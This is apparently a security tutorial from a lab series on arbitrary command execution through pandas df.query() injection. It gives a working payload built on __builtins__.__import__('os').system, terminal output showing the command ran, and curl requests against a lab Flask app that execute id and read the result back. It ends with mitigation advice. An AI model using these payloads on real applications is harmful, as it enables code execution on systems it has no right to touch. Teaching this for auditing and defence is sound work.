PyFu

Python Pandas Library Arbitrary Command Execution

Python-based Web Application Attacks

The pandas library is one of the most widely used data manipulation tools in the Python ecosystem, particularly in data science, analytics, and backend services that process tabular data.

Panda is a third-party library, not included in the Python standard library, and is commonly used in web APIs, automation tools, and data platforms.

One of its features, query(), allows users to filter rows based on logical expressions written as strings.

While powerful and convenient, this function can be dangerous if user input is passed directly into the query string, especially in applications that expose this functionality through APIs or form inputs.

The reason is that query() can evaluate Python expressions, including those that access special objects like __builtins__, making it a potential vector for arbitrary command execution.

If untrusted input reaches query() without proper sanitization, attackers can craft malicious payloads that inject arbitrary Python expressions.

This includes referencing dangerous attributes such as __builtins__, which exposes built-in functions like __import__, allowing the attacker to execute arbitrary code.

Pandas query() Exploitation

In the following example, an application reads a CSV file into a DataFrame and allows filtering rows based on a user-supplied name.

Instead of proper input handling, the user-controlled string is directly embedded inside the query() function call:

import pandas as pd

df = pd.read_csv("./data.csv")
target_name = '(@__builtins__.__import__("os").system("id>/tmp/pwned")).__eq__(1)#'
results = df.query(f"{target_name}")
print(results)

The malicious payload leverages @ to inject a Python expression that accesses __builtins__.__import__("os").system(), allowing arbitrary system command execution.

In this case, the payload runs id>/tmp/pwned, redirecting the output of the id command into a file for later retrieval.

hackpad :: PyFu/generic-py-fu/pandas-example » ls /tmp/pwned
ls: cannot access '/tmp/pwned': No such file or directory
hackpad :: PyFu/generic-py-fu/pandas-example 2 » python3 vulnerable-panda.py 
...
KeyError: 'False: boolean label can not be used without a boolean index'
hackpad :: PyFu/generic-py-fu/pandas-example 1 » cat /tmp/pwned
uid=1001(hacker) gid=1001(hacker) groups=1001(hacker),27(sudo),100(users),983(ollama)
hackpad :: PyFu/generic-py-fu/pandas-example » 

The successful execution demonstrates that even if the query raises an exception during evaluation, the injected system command is still executed, as the expression is evaluated before pandas processes the query logic.

In real-world scenarios, the attacker must carefully craft and escape the payload to ensure it integrates into the query string without causing syntax errors and successfully triggers code evaluation.

Why pandas query() injection matters from an offensive security perspective

I treat a user-reachable df.query() as an eval in disguise, and that is exactly how I score it: arbitrary Python execution in the application process, which on the python engine means full command execution under the service account. What makes it dangerous in practice is how innocuous it looks. The endpoint advertises itself as a data filter, the developer thinks they are passing a comparison expression, and the @ syntax plus __builtins__ quietly turns that filter into a shell. Even when the query then raises, the injected expression has already run, so a 400 response is not a sign the attack failed.

This shows up in analytics and reporting backends far more than people expect. The tells I audit for:

  • df.query(user_string) or df.eval(user_string) with any request-derived value. The string is evaluated, not parsed, so concatenation, f-strings, and “filter expression” parameters are all equivalent here.
  • engine="python" or a default that falls back to it. The numexpr engine is narrower, but missing dependencies or unsupported syntax silently drop back to the Python evaluator that hands me __builtins__.
  • Search, filter, sort, and “advanced query” boxes over tabular data. Dashboards that let users type expressions against a DataFrame are the classic carrier, and they are often behind only a thin login.
  • Errors that leak evaluation. A KeyError or boolean-index complaint after I inject tells me the expression reached the evaluator, which is the same signal I use to confirm blind execution.

The defender takeaway: keep attacker input out of query() and eval() entirely and build the predicate server-side from an allowlist.

Proof of exploitation

Run the lab app (PyFuLabs/flask-fu/flask-pandas-rce). The q parameter goes straight into df.query(..., engine="python"), which evaluates Python. The first request runs id and writes it to disk; the query then errors, but the command has already executed:

curl -sG "http://pyfu.local/flask-fu/flask-pandas-rce/search" \
  --data-urlencode 'q=(@__builtins__.__import__("os").system("id>/tmp/pwned")).__eq__(1)#'
# -> HTTP 400 (pandas error); the command already ran

Reading the file back through a second injected expression confirms execution:

curl -sG "http://pyfu.local/flask-fu/flask-pandas-rce/search" \
  --data-urlencode 'q=(@__builtins__.__import__("os").popen("cat /tmp/pwned").read())'
{
  "error": "'uid=0(root) gid=0(root) groups=0(root)\n'"
}

Mitigation

The fix is to keep user input out of df.query() and df.eval(), which expose a Python expression evaluator; do not pass attacker-controlled strings to them at all. If users must filter data, parse their input into a constrained, server-built predicate (a small allowlist of columns, operators, and literal values) and apply it with boolean indexing rather than handing the raw string to the python engine. Treat that engine the same way you treat eval, because that is effectively what it is.